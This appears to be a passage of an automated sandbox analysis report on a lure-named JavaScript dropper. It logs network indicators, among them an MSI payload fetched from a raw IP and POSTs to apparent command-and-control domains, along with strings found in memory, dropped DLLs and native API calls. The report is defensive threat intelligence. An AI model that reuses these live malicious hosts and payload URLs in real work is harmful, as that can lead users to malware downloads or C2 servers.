Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217
Source: unknown	TCP traffic detected without corresponding DNS query: 45.95.11.217

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000187EC858D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

6_2_00000187EC858D90

Source: global traffic

HTTP traffic detected: GET /ad.msi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows InstallerHost: 45.95.11.217

Source: global traffic	DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic	DNS traffic detected: DNS query: grizmotras.com

Source: unknown

HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache

Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: ftp://ftp%2desktop.ini
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032880345.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035225115.00000207B4E01000.00000004.00000020.00020000.00000000.sdmp, Document_a19_79b555791-28h97348k5477-3219g9.js	String found in binary or memory: http://45.95.11.217/ad.msi
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msi%
Source: ~DF428E4FF550ED71C3.TMP.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi-1780707424311028180
Source: ~DF3025BC11E5C97B03.TMP.2.dr, ~DFE66F7BB54D4BA8DC.TMP.2.dr, ~DFAB72B8B8E96537BE.TMP.2.dr, ~DF22CBD4461B033FB8.TMP.2.dr, ~DF0C3825C8A6AE7DC2.TMP.2.dr, inprogressinstallinfo.ipi.2.dr	String found in binary or memory: http://45.95.11.217/ad.msi0
Source: wscript.exe, 00000000.00000003.2156644454.00000207B4D0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiLin
Source: wscript.exe, 00000000.00000002.2158447349.00000207B5459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.217/ad.msiV
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.dig
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesi
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digice7
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enc
Source: rundll32.exe	String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://dr.f.360.cn/scanlist
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035627252.00000207B53D2000.00000004.00000020.00020000.00000000.sdmp, MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: wscript.exe, 00000000.00000002.2158447349.00000207B53D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2035595319.00000207B4D01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2158054345.00000207B4D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr4(
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: rundll32.exe	String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe	String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/Q
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/T
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040569360.00000207B544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wscript.exe, 00000000.00000003.2040677735.00000207B5427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdllI
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com//-cY
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Ep
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Qc-
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/ll
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/W
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7aB
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/D
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/g5
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/onsG
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/zedv5
Source: rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repo
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Jump to dropped file

System Summary

PE file contains section with special chars

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Sample has a suspicious name (potential lure to open the executable)

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Static file information: Suspicious name

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8578C0 NtReadFile,	6_2_00000187EC8578C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857A54 NtWriteFile,	6_2_00000187EC857A54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8579C8 NtClose,	6_2_00000187EC8579C8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857B40 NtFreeVirtualMemory,	6_2_00000187EC857B40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857588 RtlInitUnicodeString,NtCreateFile,NtClose,	6_2_00000187EC857588
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85378C NtClose,	6_2_00000187EC85378C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8577B0 RtlInitUnicodeString,NtCreateFile,	6_2_00000187EC8577B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B0C4 NtOpenKey,RtlpNtOpenKey,	6_2_00000187EC85B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	6_2_00000187EC85B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85AD34 NtAllocateVirtualMemory,	6_2_00000187EC85AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	6_2_00000187EC85463C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857ACC NtClose,	6_2_00000187EC857ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857694 RtlInitUnicodeString,NtDeleteFile,	6_2_00000187EC857694
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857704 NtQueryInformationFile,	6_2_00000187EC857704
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85745C RtlInitUnicodeString,NtOpenFile,NtClose,	6_2_00000187EC85745C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A78 NtClose,	6_2_00000187EC860A78
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A90 NtDeleteFile,	6_2_00000187EC860A90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85CB54 NtDelayExecution,	6_2_00000187EC85CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AC0 NtFreeVirtualMemory,	6_2_00000187EC860AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AF0 NtWriteFile,	6_2_00000187EC860AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB0C4 NtOpenKey,RtlpNtOpenKey,	7_2_00000201DAAEB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7A54 NtWriteFile,	7_2_00000201DAAE7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	7_2_00000201DAAE463C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE378C NtClose,	7_2_00000201DAAE378C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	7_2_00000201DAAEB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE77B0 RtlInitUnicodeString,NtCreateFile,	7_2_00000201DAAE77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAECB54 NtDelayExecution,	7_2_00000201DAAECB54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7B40 NtFreeVirtualMemory,	7_2_00000201DAAE7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEAD34 NtAllocateVirtualMemory,	7_2_00000201DAAEAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A90 NtDeleteFile,	7_2_00000201DAAF0A90
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7694 RtlInitUnicodeString,NtDeleteFile,	7_2_00000201DAAE7694
